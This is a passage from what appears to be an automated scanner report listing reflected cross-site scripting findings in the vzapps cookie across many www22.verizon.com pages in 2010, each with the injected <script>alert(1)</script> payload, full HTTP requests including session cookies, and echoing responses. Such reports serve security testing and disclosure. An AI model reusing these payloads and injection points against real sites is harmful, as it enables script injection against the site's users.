Date: Sat, 20 Nov 2010 00:11:30 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX50cb2'><script>alert(1)</script>84521e8362; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | DirecTV | Overview
</title><meta name="keywords" content="direct tv, directv, hd tv, hd, hd channels, tv, dvr, direct tv, satellite, satel
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX50CB2'><SCRIPT>ALERT(1)</SCRIPT>84521E8362 ' />
...[SNIP]...

1.32. http://www22.verizon.com/Residential/DirecTV/ChannelsEnglish/ChannelsEnglish.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/DirecTV/ChannelsEnglish/ChannelsEnglish.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e7f4a'><script>alert(1)</script>12ba1c0fab5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/ChannelsEnglish/ChannelsEnglish.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXe7f4a'><script>alert(1)</script>12ba1c0fab5; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 179664
Expires: Sat, 20 Nov 2010 00:12:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:33 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXe7f4a'><script>alert(1)</script>12ba1c0fab5; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | DirecTV | Channels
</title><meta name="keywords" content="direct tv channels, hd tv channels, hd channels, tv channels, dvr channels, dire
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXE7F4A'><SCRIPT>ALERT(1)</SCRIPT>12BA1C0FAB5 ' />
...[SNIP]...

1.33. http://www22.verizon.com/Residential/DirecTV/Equipment/Equipment.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/DirecTV/Equipment/Equipment.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4eb83'><script>alert(1)</script>d3ff6108a2c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4eb83'><script>alert(1)</script>d3ff6108a2c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71665
Expires: Sat, 20 Nov 2010 00:11:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:45 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX4eb83'><script>alert(1)</script>d3ff6108a2c; path=/
Set-Cookie: ContextInfo_Equipment=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | DirecTV | Receivers | HD DVR
</title><meta name="keywords" content="receiver, high definition receiver, hd reciever, dvr receiver, sd rece
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX4EB83'><SCRIPT>ALERT(1)</SCRIPT>D3FF6108A2C ' />
...[SNIP]...

1.34. http://www22.verizon.com/Residential/DirecTV/Installation/Installation.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/DirecTV/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9a607'><script>alert(1)</script>d0ccb927d19 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX9a607'><script>alert(1)</script>d0ccb927d19; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 50560
Expires: Sat, 20 Nov 2010 00:09:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:11 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX9a607'><script>alert(1)</script>d0ccb927d19; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | DirecTV | Installation
</title><meta name="keywords" content="directv installation, satellite installation, install satellite, install tv,
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX9A607'><SCRIPT>ALERT(1)</SCRIPT>D0CCB927D19 ' />
...[SNIP]...

1.35. http://www22.verizon.com/Residential/DirecTV/Installation/Installation.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/DirecTV/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 7ac79<script>alert(1)</script>c047a0243fc was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX7ac79<script>alert(1)</script>c047a0243fc; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 50556
Expires: Sat, 20 Nov 2010 00:09:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:26 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX7ac79<script>alert(1)</script>c047a0243fc; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | DirecTV | Installation
</title><meta name="keywords" content="directv installation, satellite installation, install satellite, install tv,
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX7AC79<SCRIPT>ALERT(1)</SCRIPT>C047A0243FC </DIV>
...[SNIP]...

1.36. http://www22.verizon.com/Residential/DirecTV/Packages/Packages.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/DirecTV/Packages/Packages.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 474e8'><script>alert(1)</script>6198f299341 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Packages/Packages.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX474e8'><script>alert(1)</script>6198f299341; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 65391
Expires: Sat, 20 Nov 2010 00:12:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:53 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX474e8'><script>alert(1)</script>6198f299341; path=/
Set-Cookie: ContextInfo_Language=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | DirecTV | Packages | English
</title><meta name="keywords" content="spanish package, directv bundle package, bundle package, satellite bun
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX474E8'><SCRIPT>ALERT(1)</SCRIPT>6198F299341 ' />
...[SNIP]...

1.37. http://www22.verizon.com/Residential/DirecTV/Premium/Premium.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/DirecTV/Premium/Premium.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 64704'><script>alert(1)</script>60e1cc3bb19 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/DirecTV/Premium/Premium.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX64704'><script>alert(1)</script>60e1cc3bb19; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 84381
Expires: Sat, 20 Nov 2010 00:10:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:02 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX64704'><script>alert(1)</script>60e1cc3bb19; path=/
Set-Cookie: ContextInfo_DTVPremium=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | DirecTV | Premiums
</title><meta name="keywords" content="channels, premium programming, sports packages, movie packages, premium packages
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX64704'><SCRIPT>ALERT(1)</SCRIPT>60E1CC3BB19 ' />
...[SNIP]...

1.38. http://www22.verizon.com/Residential/EntertainmentOnDemand/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/EntertainmentOnDemand/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ecc81'><script>alert(1)</script>633e3a55ed6 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/EntertainmentOnDemand/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXecc81'><script>alert(1)</script>633e3a55ed6; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 50751
Expires: Sat, 20 Nov 2010 00:16:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:06 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXecc81'><script>alert(1)</script>633e3a55ed6; path=/
Set-Cookie: FLOWTYPE=VASIP; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Entertainment on Demand
</title><meta name="keywords" content="verizon entertainment on demand, verizon eod, verizon games, verizon movies
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXECC81'><SCRIPT>ALERT(1)</SCRIPT>633E3A55ED6 ' />
...[SNIP]...

1.39. http://www22.verizon.com/Residential/EntertainmentOnDemand/Games/Games.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/EntertainmentOnDemand/Games/Games.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 676cd'><script>alert(1)</script>a3a252376e7 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/EntertainmentOnDemand/Games/Games.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX676cd'><script>alert(1)</script>a3a252376e7; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75296
Expires: Sat, 20 Nov 2010 00:16:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:22 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX676cd'><script>alert(1)</script>a3a252376e7; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Entertainment on Demand: Games
</title><meta name="keywords" content="games, world of warcraft, internet games, online games, action game
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX676CD'><SCRIPT>ALERT(1)</SCRIPT>A3A252376E7 ' />
...[SNIP]...

1.40. http://www22.verizon.com/Residential/EntertainmentOnDemand/Movies/Movies.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/EntertainmentOnDemand/Movies/Movies.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 46bbc'><script>alert(1)</script>e3e3a635f7b was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/EntertainmentOnDemand/Movies/Movies.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX46bbc'><script>alert(1)</script>e3e3a635f7b; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70797
Expires: Sat, 20 Nov 2010 00:16:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX46bbc'><script>alert(1)</script>e3e3a635f7b; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Entertainment on Demand: Movies
</title><meta name="keywords" content="video downloads, movie downloads, internet movie, internet televisi
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX46BBC'><SCRIPT>ALERT(1)</SCRIPT>E3E3A635F7B ' />
...[SNIP]...

1.41. http://www22.verizon.com/Residential/FiOSInternet/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 56c4c'><script>alert(1)</script>277bd852140 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX56c4c'><script>alert(1)</script>277bd852140; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119110
Expires: Sat, 20 Nov 2010 00:11:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:18 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:18 GMT; path=/
Set-Cookie: ContextInfo_State=TX56c4c'><script>alert(1)</script>277bd852140; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:18 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:18 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:18 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX56C4C'><SCRIPT>ALERT(1)</SCRIPT>277BD852140 ' />
...[SNIP]...

1.42. http://www22.verizon.com/Residential/FiOSInternet/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload fc928<script>alert(1)</script>80e25040c4e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXfc928<script>alert(1)</script>80e25040c4e; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 117564
Expires: Sat, 20 Nov 2010 00:11:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:31 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:31 GMT; path=/
Set-Cookie: ContextInfo_State=TXfc928<script>alert(1)</script>80e25040c4e; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:31 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:31 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:31 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXFC928<SCRIPT>ALERT(1)</SCRIPT>80E25040C4E </DIV>
...[SNIP]...

1.43. http://www22.verizon.com/Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b8b99'><script>alert(1)</script>47fb54bb178 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/AboutFiOS/AboutFiOS.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
